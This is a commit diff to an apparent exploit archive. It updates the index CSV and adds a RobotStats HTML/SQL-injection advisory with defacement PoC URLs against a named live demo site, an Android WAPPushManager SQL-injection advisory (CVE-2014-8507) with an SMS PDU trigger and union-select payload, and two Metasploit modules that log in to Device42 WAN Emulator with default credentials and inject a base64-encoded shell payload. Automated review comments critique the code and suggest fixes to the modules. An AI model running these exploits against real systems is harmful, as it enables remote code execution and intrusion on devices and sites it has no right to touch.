Updated 11_28_2014
This commit is contained in:
parent
e88829222c
commit
9195172fad
16 changed files with 1382 additions and 2 deletions
18
files.csv
18
files.csv
|
@ -19578,7 +19578,7 @@ id,file,description,date,author,platform,type,port
|
|||
22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote Send_CTCP() Memory Corruption Vulnerability",2003-03-06,eSDee,linux,remote,0
|
||||
22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability",2003-03-09,s0h,windows,local,0
|
||||
22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 'texis.exe' Information Disclosure Vulnerability",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0
|
||||
22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x,CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow Vulnerability",2003-03-15,flatline,unix,remote,0
|
||||
22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow Vulnerability",2003-03-15,flatline,unix,remote,0
|
||||
22357,platforms/asp/webapps/22357.txt,"RSA ClearTrust 4.6/4.7 Login Page Cross Site Scripting Vulnerability",2003-03-15,sir.mordred@hushmail.com,asp,webapps,0
|
||||
22358,platforms/multiple/dos/22358.cfm,"Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (1)",2003-03-15,"Marc Schoenefeld",multiple,dos,0
|
||||
22359,platforms/multiple/dos/22359.xsl,"Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (2)",2003-03-15,"Marc Schoenefeld",multiple,dos,0
|
||||
|
@ -30023,7 +30023,7 @@ id,file,description,date,author,platform,type,port
|
|||
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
|
||||
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
|
||||
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
|
||||
33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
|
||||
33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
|
||||
33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0
|
||||
33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0
|
||||
33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0
|
||||
|
@ -31831,7 +31831,9 @@ id,file,description,date,author,platform,type,port
|
|||
35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0
|
||||
35340,platforms/php/webapps/35340.txt,"Wordpress wpDataTables Plugin 1.5.3 - SQL Injection Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
|
||||
35341,platforms/php/webapps/35341.py,"Wordpress wpDataTables Plugin 1.5.3 - Unauthenticated Shell Upload Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
|
||||
35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",aix,dos,0
|
||||
35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 '$smarty.template' PHP Code Injection Vulnerability",2011-02-09,jonieske,php,webapps,0
|
||||
35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot param) SQL Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",php,webapps,0
|
||||
35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0
|
||||
35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Path Traversal",2014-11-24,"Kacper Szurek",php,webapps,0
|
||||
35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 'style' Parameter Cross Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0
|
||||
|
@ -31860,3 +31862,15 @@ id,file,description,date,author,platform,type,port
|
|||
35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 'wpfn' Parameter Cross Site Scripting Vulnerability",2011-02-22,"High-Tech Bridge SA",php,webapps,0
|
||||
35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 'stcenter.nsf' Cross Site Scripting Vulnerability",2011-02-22,andrew,php,webapps,0
|
||||
35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x 'p' Parameter Cross Site Scripting Vulnerability",2011-02-22,"Aung Khant",php,webapps,0
|
||||
35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 'lang' Parameter Local File Include Vulnerability",2011-02-16,"AutoSec Tools",php,webapps,0
|
||||
35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0
|
||||
35379,platforms/windows/dos/35379.go,"Elipse E3 HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
|
||||
35380,platforms/php/remote/35380.rb,"Pandora FMS SQLi Remote Code Execution",2014-11-26,metasploit,php,remote,80
|
||||
35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - CSRF Vulnerability",2014-11-26,"High-Tech Bridge SA",php,webapps,80
|
||||
35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0
|
||||
35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
|
||||
35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
|
||||
35385,platforms/php/webapps/35385.pl,"Slider Revolution/Showbiz Pro Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80
|
||||
35386,platforms/linux/remote/35386.txt,"Logwatch Log File Special Characters Local Privilege Escalation Vulnerability",2011-02-24,"Dominik George",linux,remote,0
|
||||
35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 'page' Parameter Cross Site Scripting Vulnerability",2011-02-25,"Aung Khant",php,webapps,0
|
||||
35388,platforms/php/webapps/35388.txt,"WordPress HTML 5 MP3 Player with Playlist Plugin - Full Path Disclosure",2014-11-27,"KnocKout inj3ct0r",php,webapps,0
|
||||
|
|
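Review bot: Two of the new index rows disagree with the advisories they point to, which matters because the platform and type columns are what searchsploit and the site filter on. `35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",aix,dos,0` files a PHP web-application issue under aix/dos, so nobody browsing php/webapps will find it; the row should be `35342,platforms/php/webapps/35342.txt,...,php,webapps,0` with the file moved to match. Likewise `35386,platforms/linux/remote/35386.txt,"Logwatch Log File Special Characters Local Privilege Escalation Vulnerability",...,linux,remote,0` files a local privilege escalation under remote and should be `platforms/linux/local/35386.txt,...,linux,local,0`. The 35382 row types the Android WAPPushManager entry as `dos` although its advisory describes launching arbitrary activities and services, which is worth a second look as well.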
|
111
platforms/aix/dos/35342.txt
Executable file
111
platforms/aix/dos/35342.txt
Executable file
|
@ -0,0 +1,111 @@
|
|||
# Title : RobotStats v1.0 HTML Injection Vulnerability
|
||||
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
|
||||
# Home : http://milw00rm.com / its online
|
||||
# Twitter : https://twitter.com/milw00rm or @milw00rm
|
||||
# Date : 22.11.2014
|
||||
# Demo : http://alpesoiseaux.free.fr/robotstats/
|
||||
# Download : http://www.robotstats.com/en/robotstats.zip
|
||||
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
|
||||
# Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
|
||||
|
||||
Desc.:
|
||||
no security for admin folder (session control, login panel or anyone... maybe its different vulnerability)
|
||||
and no any filter for html code at robots.lib.php. you can inject your html code or xss code.
|
||||
|
||||
html inj.:
|
||||
|
||||
target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
|
||||
|
||||
after you go here:
|
||||
|
||||
target.com/robotstats/info-robot.php?robot=(robot id)
|
||||
|
||||
or
|
||||
|
||||
target.com/robotstats/admin/robots.php you will see your html page
|
||||
|
||||
analysis: (/admin/robots.php)
|
||||
|
||||
include "robots.lib.php"; //line 26
|
||||
|
||||
else if ($rub == "ajouter")
|
||||
{
|
||||
updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url); //line 65 (we will be analysis to robots.lib.php for line)
|
||||
}
|
||||
|
||||
analysis: (/admin/robots.lib.php)
|
||||
|
||||
you look code. you will see blank control for "name" and "user agent" but will'nt see any filter for inject (// look line 203 no any filter) no any control or filter for code inject.
|
||||
|
||||
function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url)
|
||||
//line 163 (remember function line 65 in robots.php)
|
||||
{
|
||||
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
|
||||
|
||||
// dans tous les cas :
|
||||
echo "<p class='normal'><a class='erreur'> ";
|
||||
$msg = "";
|
||||
|
||||
// test du nom
|
||||
if ($nom == '') //line 172 control of blank or not blank
|
||||
{
|
||||
$msg = $RS_LANG["BadRobotName"];
|
||||
}
|
||||
|
||||
// test selon le mode de detection
|
||||
if ($detection == $RS_DETECTION_USER_AGENT) //line 178 control of your "detection mode" choice
|
||||
{
|
||||
if ($user_agent == '') //line 180 control of blank or not blank
|
||||
{
|
||||
$msg = $RS_LANG["BadUserAgent"];
|
||||
}
|
||||
}
|
||||
else if ($detection == $RS_DETECTION_IP) //line 185 control of your "detection mode" choice
|
||||
{
|
||||
if ( ($ip1 == '') && ($ip2 == '') ) //line 187 control of your "ip1 and ip2" choice
|
||||
{
|
||||
$msg = $RS_LANG["IPNotSpecified"];
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
$msg = $RS_LANG["BadDetectionMode"];
|
||||
}
|
||||
|
||||
if ($msg != "")
|
||||
{
|
||||
echo $msg;
|
||||
}
|
||||
else
|
||||
{
|
||||
$liste_champs = "nom, actif, user_agent, ip1, ip2, detection, descr_fr, descr_en, url"; // line 203 no any filter
|
||||
$liste_valeurs = "\"$nom\", \"$actif\", \"$user_agent\", \"$ip1\", \"$ip2\", \"$detection\", \"$descr_fr\", \"$descr_en\", \"$url\"";
|
||||
if ($robot > 0) // cas d'une modification et non d'un ajout //line 205 control of your choice "wanna update any bot or add new bot"
|
||||
{
|
||||
$liste_champs .= ", id";
|
||||
$liste_valeurs .= ", '$robot'";
|
||||
$sql = "REPLACE INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
|
||||
$res = mysql_query($sql) or erreurServeurMySQL($sql);
|
||||
echo $RS_LANG["RobotUpdated"];
|
||||
}
|
||||
else
|
||||
{
|
||||
$sql = "INSERT INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
|
||||
$res = mysql_query($sql) or erreurServeurMySQL($sql);
|
||||
echo $RS_LANG["RobotAdded"];
|
||||
}
|
||||
}
|
||||
|
||||
for demo:
|
||||
|
||||
http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
|
||||
|
||||
after you go here:
|
||||
|
||||
http://alpesoiseaux.free.fr/robotstats/info-robot.php?robot=(robot id)
|
||||
|
||||
or
|
||||
|
||||
http://alpesoiseaux.free.fr/robotstats/admin/robots.php
|
||||
|
||||
you will see your html page
|
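Review bot: The advisory's own code excerpt shows a more serious issue than the HTML injection in the title: `$liste_valeurs = "\"$nom\", \"$actif\", \"$user_agent\", ..."` interpolates every request parameter straight into the `INSERT INTO` / `REPLACE INTO` strings handed to `mysql_query()`, so `nom`, `user_agent`, `url` and the rest are SQL-injectable through the same `rub=ajouter` request, not only the `robot` parameter covered by the sibling entry 35344 (unless the host happens to run with magic_quotes_gpc on, which the text does not establish). The most important finding is also buried in the description rather than the title: `admin/robots.php` is reachable with no session check, and the stored markup is rendered on the public `info-robot.php?robot=` page for every visitor, so this is unauthenticated stored XSS and should be labelled as such. The PoC should use a neutral marker such as `<script>alert(1)</script>` against `target.com` instead of a `<body bgcolor=black>` defacement payload aimed at a named third-party install.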
143
platforms/android/dos/35382.txt
Executable file
143
platforms/android/dos/35382.txt
Executable file
|
@ -0,0 +1,143 @@
|
|||
INTRODUCTION
|
||||
==================================
|
||||
In Android <5.0, a SQL injection vulnerability exists in the opt module WAPPushManager, attacker can remotely send malformed WAPPush message to launch any activity or service in the victim's phone (need permission check)
|
||||
|
||||
DETAILS
|
||||
==================================
|
||||
When a WAPPush message is received, the raw pdu is processed by dispatchWapPdu method in com\android\internal\telephony\WapPushOverSms.java
|
||||
|
||||
Here the pdu is parsed to get the contentType & wapAppId:
|
||||
|
||||
String mimeType = pduDecoder.getValueString();
|
||||
...
|
||||
/**
|
||||
* Seek for application ID field in WSP header.
|
||||
* If application ID is found, WapPushManager substitute the message
|
||||
* processing. Since WapPushManager is optional module, if WapPushManager
|
||||
* is not found, legacy message processing will be continued.
|
||||
*/
|
||||
if (pduDecoder.seekXWapApplicationId(index, index + headerLength - 1)) {
|
||||
index = (int) pduDecoder.getValue32();
|
||||
pduDecoder.decodeXWapApplicationId(index);
|
||||
String wapAppId = pduDecoder.getValueString();
|
||||
if (wapAppId == null) {
|
||||
wapAppId = Integer.toString((int) pduDecoder.getValue32());
|
||||
}
|
||||
String contentType = ((mimeType == null) ?
|
||||
Long.toString(binaryContentType) : mimeType);
|
||||
if (DBG) Rlog.v(TAG, "appid found: " + wapAppId + ":" + contentType);
|
||||
|
||||
The wapAppId & contentType can be literal string embeded in the pdu, to prove this, we can launch Android 4.4 emulator and send sms pdu by telnet console
|
||||
|
||||
Type the following command in telnet console:
|
||||
|
||||
sms pdu 0040000B915121551532F40004800B05040B84C0020003F001010A065603B081EAAF2720756e696f6e2073656c65637420302c27636f6d2e616e64726f69642e73657474696e6773272c27636f6d2e616e64726f69642e73657474696e67732e53657474696e6773272c302c302c302d2d200002066A008509036D6F62696C65746964696E67732E636F6D2F0001
|
||||
|
||||
And watch the radio logcat message in emulator, it prints out the extracted malicious appid:
|
||||
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--
|
||||
|
||||
However, since the WAPPushManager is optional, it is not installed in the emulator, so it then prints "wap push manager not found!"
|
||||
|
||||
But if the WAPPushManager is installed, the extracted wapAppId & contentType will be send to its method processMessage:
|
||||
|
||||
try {
|
||||
boolean processFurther = true;
|
||||
IWapPushManager wapPushMan = mWapPushManager;
|
||||
if (wapPushMan == null) {
|
||||
if (DBG) Rlog.w(TAG, "wap push manager not found!");
|
||||
} else {
|
||||
Intent intent = new Intent();
|
||||
intent.putExtra("transactionId", transactionId);
|
||||
intent.putExtra("pduType", pduType);
|
||||
intent.putExtra("header", header);
|
||||
intent.putExtra("data", intentData);
|
||||
intent.putExtra("contentTypeParameters",
|
||||
pduDecoder.getContentParameters());
|
||||
int procRet = wapPushMan.processMessage(wapAppId, contentType, intent);
|
||||
|
||||
So we go on checking the source code of WAPPushManager:
|
||||
|
||||
https://android.googlesource.com/platform/frameworks/base/+/android-4.4.4_r2.0.1/packages/WAPPushManager/
|
||||
|
||||
In the method processMessage, the app_id and content_type is used in the method queryLastApp:
|
||||
|
||||
public int processMessage(String app_id, String content_type, Intent intent)
|
||||
throws RemoteException {
|
||||
Log.d(LOG_TAG, "wpman processMsg " + app_id + ":" + content_type);
|
||||
WapPushManDBHelper dbh = getDatabase(mContext);
|
||||
SQLiteDatabase db = dbh.getReadableDatabase();
|
||||
WapPushManDBHelper.queryData lastapp = dbh.queryLastApp(db, app_id, content_type);
|
||||
db.close();
|
||||
|
||||
Then in the method queryLastApp, both app_id and content_type is concatenated without any escaping to build the rawQuery sql input,
|
||||
|
||||
protected queryData queryLastApp(SQLiteDatabase db,
|
||||
String app_id, String content_type) {
|
||||
String sql = "select install_order, package_name, class_name, "
|
||||
+ " app_type, need_signature, further_processing"
|
||||
+ " from " + APPID_TABLE_NAME
|
||||
+ " where x_wap_application=\'" + app_id + "\'"
|
||||
+ " and content_type=\'" + content_type + "\'"
|
||||
+ " order by install_order desc";
|
||||
if (DEBUG_SQL) Log.v(LOG_TAG, "sql: " + sql);
|
||||
Cursor cur = db.rawQuery(sql, null);
|
||||
|
||||
Obviously, this is a SQL injection, for example, if app_id is as follows:
|
||||
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--
|
||||
|
||||
Then the package_name & class_name of query result would be:
|
||||
"com.android.settings" and "com.android.settings.Setttings"
|
||||
|
||||
OK, then we return back to the method processMessage of WAPPushManager
|
||||
The appType, packageName, className is fully controllable, which will be used to set the component of an intent to start a activity or service
|
||||
That means, attacker can remotely launch any activity or service by construct malformed WAPPush Message (need permission check)
|
||||
|
||||
if (lastapp.appType == WapPushManagerParams.APP_TYPE_ACTIVITY) {
|
||||
//Intent intent = new Intent(Intent.ACTION_MAIN);
|
||||
intent.setClassName(lastapp.packageName, lastapp.className);
|
||||
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
|
||||
try {
|
||||
mContext.startActivity(intent);
|
||||
} catch (ActivityNotFoundException e) {
|
||||
Log.w(LOG_TAG, "invalid name " +
|
||||
lastapp.packageName + "/" + lastapp.className);
|
||||
return WapPushManagerParams.INVALID_RECEIVER_NAME;
|
||||
}
|
||||
} else {
|
||||
intent.setClassName(mContext, lastapp.className);
|
||||
intent.setComponent(new ComponentName(lastapp.packageName,
|
||||
lastapp.className));
|
||||
if (mContext.startService(intent) == null) {
|
||||
Log.w(LOG_TAG, "invalid name " +
|
||||
lastapp.packageName + "/" + lastapp.className);
|
||||
return WapPushManagerParams.INVALID_RECEIVER_NAME;
|
||||
}
|
||||
}
|
||||
|
||||
This has been fixed in android 5.0 (android bug id 17969135)
|
||||
https://android.googlesource.com/platform/frameworks/base/+/48ed835468c6235905459e6ef7df032baf3e4df6
|
||||
|
||||
TIMELINE
|
||||
==================================
|
||||
11.10.2014 Initial report to Android Security Team with the POC
|
||||
14.10.2014 Reply from Android Security Team "are looking into it"
|
||||
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, request status update
|
||||
08.11.2014 Reply from Android Security Team "have fixed the issue in L (which is now in AOSP) and have provided patches to partners"
|
||||
09.11.2014 Contact MITRE about this issue
|
||||
17.11.2014 CVE-2014-8507 assigned
|
||||
26.11.2014 Public Disclosure
|
||||
|
||||
IDENTIFIERS
|
||||
==================================
|
||||
CVE-2014-8507
|
||||
Android id 17969135
|
||||
|
||||
CREDITS
|
||||
==================================
|
||||
WangTao (neobyte) of Baidu X-Team
|
||||
WangYu of Baidu X-Team
|
||||
Zhang Donghui of Baidu X-Team
|
||||
|
||||
--
|
||||
BAIDU X-TEAM (xteam.baidu.com)
|
||||
An external link of this advisory can be found at http://xteam.baidu.com/?p=167
|
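Review bot: The advisory does not say that the injected row also controls the columns that gate the launch: the query selects `install_order, package_name, class_name, app_type, need_signature, further_processing`, and the payload `' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--` therefore sets `app_type` and `need_signature` to attacker-chosen values, which presumably neutralises whatever signature check processMessage performs between the query and the `startActivity`/`startService` calls quoted (that part of processMessage is outside the excerpt, so the "(need permission check)" caveat should be spelled out). The remediation should be stated for readers maintaining pre-5.0 forks: `queryLastApp` should use `?` placeholders and `db.rawQuery(sql, new String[]{app_id, content_type})` instead of concatenation. The sample `sms pdu` hex is given without its decoded layout; one line noting where the X-Wap-Application-Id string begins in the hex would let others verify the trigger, and `"com.android.settings.Setttings"` in the expected result has a stray letter.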
103
platforms/cgi/webapps/35383.rb
Executable file
103
platforms/cgi/webapps/35383.rb
Executable file
|
@ -0,0 +1,103 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'WAN Emulator v2.3 Command Execution',
|
||||
'Description' => %q{
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Privileged' => true,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Author' =>
|
||||
[
|
||||
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "",
|
||||
'DisableNops' => true,
|
||||
#'Compat' =>
|
||||
# {
|
||||
# 'PayloadType' => 'cmd',
|
||||
# 'RequiredCmd' => 'generic netcat netcat-e',
|
||||
# }
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => 'none'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Targeting', { 'auto' => true }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 12 2012'
|
||||
))
|
||||
end
|
||||
|
||||
def exploit
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
|
||||
})
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
|
||||
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
|
||||
|
||||
post = {
|
||||
'csrfmiddlewaretoken' => csrf,
|
||||
'username' => 'd42admin',
|
||||
'password' => 'default',
|
||||
'next' => '/'
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
|
||||
'vars_post' => post,
|
||||
'method' => 'POST',
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
unless res.code == 302
|
||||
fail_with("auth failed")
|
||||
end
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'ping/'),
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
|
||||
|
||||
post = {
|
||||
'csrfmiddlewaretoken' => csrf,
|
||||
'traceip' => "www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`",
|
||||
'trace' => ''
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'ping/'),
|
||||
'method' => "POST",
|
||||
'vars_post' => post,
|
||||
'cookie' => cookie
|
||||
})
|
||||
end
|
||||
end
|
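Review bot: Every `send_request_cgi` result is dereferenced without a nil check, so a closed port or timeout raises NoMethodError on `res.headers['Set-Cookie']` before the module ever reaches `fail_with("auth failed")`, and that call itself omits the `Failure::` reason the framework expects as its first argument. The credentials `d42admin` / `default` are hard-coded rather than exposed as datastore options, the CSRF token is used even when the regex did not match, and `Description` and `References` are empty, so the module documents neither the product (Device42, per the file index) nor where the issue was disclosed. The final injection POST is also never checked, so the user gets no feedback when the request fails. The metadata should additionally be reconciled with the index, which credits "Brandon Perry" while the module header credits Brendan Coles.
```ruby
def initialize(info = {})
  # … unchanged: super(update_info(...)) with Description/References filled in …
  register_options(
    [
      OptString.new('USERNAME', [true, 'Username to authenticate with', 'd42admin']),
      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'default'])
    ], self.class)
end

def exploit
  res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
  })
  fail_with(Failure::Unreachable, 'No response from login page') unless res
  cookie = res.headers['Set-Cookie']
  csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*?)' \/><\/div>/
  fail_with(Failure::UnexpectedReply, 'Could not find CSRF token on login page') unless csrf

  post = {
    'csrfmiddlewaretoken' => csrf,
    'username' => datastore['USERNAME'],
    'password' => datastore['PASSWORD'],
    'next' => '/'
  }
  # … unchanged: login POST …
  unless res && res.code == 302
    fail_with(Failure::NoAccess, 'Authentication failed')
  end
  # … unchanged: ping/ GET, second token extraction, injection POST (same nil/csrf guards) …
end
```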
103
platforms/cgi/webapps/35384.rb
Executable file
103
platforms/cgi/webapps/35384.rb
Executable file
|
@ -0,0 +1,103 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'WAN Emulator v2.3 Command Execution',
|
||||
'Description' => %q{
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Privileged' => true,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Author' =>
|
||||
[
|
||||
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "",
|
||||
'DisableNops' => true,
|
||||
#'Compat' =>
|
||||
# {
|
||||
# 'PayloadType' => 'cmd',
|
||||
# 'RequiredCmd' => 'generic netcat netcat-e',
|
||||
# }
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => 'none'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Targeting', { 'auto' => true }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 12 2012'
|
||||
))
|
||||
end
|
||||
|
||||
def exploit
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
|
||||
})
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
|
||||
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
|
||||
|
||||
post = {
|
||||
'csrfmiddlewaretoken' => csrf,
|
||||
'username' => 'd42admin',
|
||||
'password' => 'default',
|
||||
'next' => '/'
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
|
||||
'vars_post' => post,
|
||||
'method' => 'POST',
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
unless res.code == 302
|
||||
fail_with("auth failed")
|
||||
end
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'ping/'),
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
|
||||
|
||||
post = {
|
||||
'csrfmiddlewaretoken' => csrf,
|
||||
'pingip' => "www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`",
|
||||
'ping' => ''
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'ping/'),
|
||||
'method' => "POST",
|
||||
'vars_post' => post,
|
||||
'cookie' => cookie
|
||||
})
|
||||
end
|
||||
end
|
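Review bot: This file is byte-for-byte the traceroute module (35383.rb) with `'traceip'`/`'trace'` swapped for `'pingip'`/`'ping'`, and both declare the identical `'Name' => 'WAN Emulator v2.3 Command Execution'`, so they are indistinguishable in `search` output and in the module tree. The two belong in one module whose target or option selects the injected field, e.g. `'Targets' => [['Ping', { 'field' => 'pingip', 'submit' => 'ping' }], ['Traceroute', { 'field' => 'traceip', 'submit' => 'trace' }]]` with `post = { 'csrfmiddlewaretoken' => csrf, target['field'] => cmd, target['submit'] => '' }` in `exploit`. The duplicated code also duplicates the same defects (nil responses dereferenced, hard-coded `d42admin` / `default`, single-argument `fail_with`), so any fix applied to one file must be mirrored here unless they are merged. The `'DisclosureDate' => 'Aug 12 2012'` and the author line should be checked against the index entry, which dates the entry 2014-11-26 and credits a different author.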
7
platforms/linux/remote/35386.txt
